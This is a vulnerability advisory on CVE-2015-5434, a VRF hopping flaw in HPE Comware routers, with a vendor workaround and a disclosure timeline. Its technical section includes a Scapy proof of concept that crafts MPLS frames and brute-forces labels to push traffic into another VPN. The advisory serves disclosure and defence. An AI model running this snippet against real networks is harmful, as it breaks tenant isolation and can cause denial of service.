HPE VRF Hopping Vulnerability

Product HP Comware 5 and Comware 7
Severity Medium
CVE Reference CVE-2015-5434
Type VRF Hopping Vulnerability


Virtual Routing and Forwarding (VRF) allows multiple instances of a routing table to exist and operate simultaneously on the same physical device. This technology can be applied for Layer 3 network segmentation, analogous to Virtual LAN (VLAN) on Layer 2. VRF is commonly used as a building block for Layer 3 Virtual Private Network (VPN) services in Multiprotocol Label Switching (MPLS) networks.

A Virtual Routing and Forwarding (VRF) hopping vulnerability exists in a number of Hewlett Packard Enterprise (HPE) routers. The affected routers fail to discard maliciously crafted MPLS traffic which can be remotely exploited by an attacker to forward traffic from one VPN to another VPN using MPLS links.


Successful VRF hopping attacks can result in forwarding traffic into an arbitrary VRF or potentially lead to a Denial of Service (DoS) condition.


Certain routers fail to discard customer-generated MPLS traffic received on a Provider Edge (PE) link to a Customer Edge (CE) device.

Interim Workaround

A possible workaround, as suggested by the vendor, is to apply a Layer 2 Access Control List (ACL) on a PE's customer-facing interface. This ACL must be configured to discard traffic pre-encapsulated in MPLS, which is achieved by filtering out Ethernet frames with EtherType of 0x8847.


Software updates have been released by the vendor to address the VRF hopping vulnerability. Please refer to HPE’s security advisory for detailed information on affected versions and the available software fixes [1].

Technical Details 

An adversary with access to a CE device can pre-encapsulate her traffic in MPLS in order to coerce a PE router into forwarding her traffic on to an arbitrary VRF. The attacker can either assign a fixed label value or, in the case of an unknown label, can perform a brute-force attack of a valid label.

The following Scapy snippet can be used to reproduce the attack, where '' and '' are the attacker’s and victim’s IP addresses respectively.

>>> load_contrib('mpls')
>>> a = Ether(src = '08:00:27:12:27:13', dst = 'XX:XX:XX:a3:7b:01')
>>> b = MPLS(ttl = 64, label = range(1000, 1500))
>>> c = IP(src = '', dst = '')
>>> d = ICMP()
>>> sendp(a/b/c/d)
Sent 500 packets.

For further details, possible attack scenarios and limitations, please refer to G. Geshev’s slide deck from B-Sides NYC [2].

Detailed Timeline




Initial contact with HPE


HPE requesting details from MWR


Technical details disclosed to HPE


HPE confirms reception


Further technical details requested by HPE


Further details provided by MWR


HPE acknowledges reception


HPE confirms a number of products are affected


Fix released by HPE


[2] Geshev - Warranty Void If Label Removed.pdf